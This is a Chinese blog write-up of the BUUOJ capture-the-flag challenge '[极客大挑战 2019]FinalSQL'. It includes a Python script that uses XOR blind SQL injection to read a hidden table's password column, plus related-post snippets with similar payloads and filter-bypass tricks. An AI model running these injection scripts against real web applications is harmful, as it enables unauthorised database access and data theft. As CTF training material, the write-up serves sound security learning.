[极客大挑战 2019]FinalSQL1

于 2024-08-09 18:17:35 发布
阅读量284 收藏 5
点赞数 5
文章标签: web安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kw741951/article/details/141066234
版权

打开题目

sql注入,点击1试一下

点击2试一下

点击3试一下

点击4

点击5

id=6试一下

感觉是sql盲注了

编写脚本

import requests
import string
from time import sleep
url = "http://9da9cb18-3096-413a-9476-8a177ffec31a.node4.buuoj.cn:81/search.php?id=0^({})"
# 如果为真时的关键字匹配
base = 'Click others'
# 盲注的字符集
chars = string.printable

inject = "ord(substr(reverse((SELECT(GROUP_CONCAT(password))FROM(geek.F1naI1y))),{},1))={}"
for i in range(1, 1000):
    continue_ = False
    for c in chars:
        u = url.format(inject.format(i,ord(c)))
        res = requests.get(u)
        while res.status_code == 429:
            sleep(1)
            res = requests.get(u)
        if base in res.text:
            print(c,end='',flush=True)
            continue_ = True
            break
    if not continue_:
        break(参考博客)

得到flag倒序,更正为

得到flag

flag{87c0b617-4e80-4135-b08c-ad013c856e27}

worker..
关注
[极客挑战 2019]FinalSQL - 异或盲注
oZuoShen123的博客
10-05 536
1、这题的关键是找注入点,如果选择用户名、密码作为输入点就麻烦了 2、注入点:按钮,点击就传id;当id=1时,提示Click others   可以利用id的特性,构造异或匹配   payload: f"1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),{j},1))={i})^1"   payload有两个异或:1^表达式^1
[极客挑战 2019]FinalSQL
feng的博客
11-21 116
知识点 SQL盲注 python脚本 知识点 这题按照提示是盲注了,注入点也是在id那里,不过自己对于盲注学的实在是太菜了,利用的^这个姿势: ?id=1^(length(database())<5)^1 真假全靠中间的语句来判断,然后写一个python脚本来爆一下: import requests url='http://5ff6066f-48be-4bf6-9ab1-c2ca3f2abf41.node3.buuoj.cn/search.php?id=' ''' 爆数据库长度 ''' ''
sql注入 [极客挑战 2019]FinalSQL1
最新发布
m0_75178803的博客
02-23 1018
逻辑符号|会被检测到,而&感觉成了注释符,&之后的内容都被替换掉了。直接盲注比较慢,还需要利用二分法来编写脚本。这里直接令传入的id=6。传入id=1^1^1。这里利用到大佬的脚本。运行一下得到flag。
[极客挑战 2019]FinalSQL 1
weixin_45577185的博客
10-12 444
开始试了试登录框,用sql注入,发现总是出现 后来发现url可能存在注入 通过bp,发现过滤了很多 输入11回显’ERROR’,10回显’NO! Not this! Click others~~~’ 由于空格被过滤,用()代替。 import requests url = 'http://279ed640-ef9f-410b-91f4-ac2f33bca34f.node4.buuoj.cn:81/search.php' flag = '' for i in range(1,250):# range.
buuctf [极客挑战 2019]FinalSQL
zoixsoadji的博客
03-30 761
进入题目,又是这个作者,试试万能密码 经过实验,双写什么的都没用。 作者说的神秘代码,点进去发现url变了 发现并没有什么卵用…… 正当我没有头绪的时候,我突然看到一句话,审题真的很重要: 盲注!这里附上大佬的脚本: import requests import time url = "http://def9937b-1746-4f41-98c7-a2b55b95664a.node4.buuoj.cn:81/search.php" temp = {"id" : ...
[极客挑战 2019]FinalSQL wp
{OvEr}的博客
11-19 471
[极客挑战 2019]FinalSQL wp 终极sql注入了,考点是盲注(写脚本的那种இ௰இ) 打开网页是这样的。 那个红色的卡片,我们随便点进去看看,直接点最后一个吧。 通过url判断注入点是id。 接着做FUZZ测试,发现同样过滤了union、or、and、||、&等我们常用的关键字,但是没有过滤异或符号^。 当我们输入id=1^1时,回显"Error" 当我们输入id=1^0时,回显正常 接下来我们进行盲注,下面是大神的脚本 step 1爆数据库 import requests u
[极客挑战 2019]FinalSQL1 wp
m0_55185160的博客
08-06 255
我们打开网页,用admin和'1去试 结果给我们返回的报错为 于是我再次输入admin ,passward进行登录结果报错还是一样, 之后把admin改* 结果报错信息还是一,样, 又因为本题为fianlSQL,可能存在盲注。 于是借助了大佬的脚本, import requests url = 'http://c088ed7a-d550-43bc-8ded-49adcdc1cfe5.node3.buuoj.cn/search.php' flag = '' for i in range(1,250)
BUUCTF [极客挑战 2019]FinalSQL
CyhDl666的博客
03-09 341
12345都点过了 访问id=6 提示 Clever! But not this table. 这里猜测id这里存在SQL注入,而不是以前的登录框 初步判断了一下,是一个数字型注入 且过滤了一些字符 需要fuzz一下 空格被过滤掉了用() union注入这些也被过滤的差不都了 FinalSQL可以想想到应该是盲注类型的题目 嘿嘿嘿 ^没有被过滤 可以在这里去搞点事情做做 题目有提示是盲注 所以这种题目还是跑脚本 import requests import sys import time def g.
buuoj [极客挑战 2019]FinalSQL
pondzhang的专栏
04-02 540
import requests #database length def get_database_length(): count = 0 while(1): url = "http://5a0d5a51-9667-4813-b173-b276246a28bc.node3.buuoj.cn/search.php?id=1^1^(length(database()...
极客挑战 2019]LoveSQL 1
08-24
LoveSQL 1是极客挑战2019的一个题目,它是一个关于 SQL 查询语言的挑战。具体来说,LoveSQL 1要求参赛者编写一个 SQL 查询,从给定的表中获取满足特定条件的数据。这个挑战旨在考察参赛者对 SQL 语法和查询的理解能力。 参赛者需要根据题目要求,在给定的表中使用合适的 SQL 查询语句,筛选出满足条件的数据,并将查询结果返回。 注意:LoveSQL 1是极客挑战2019中的一个具体题目,与其他题目无关。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值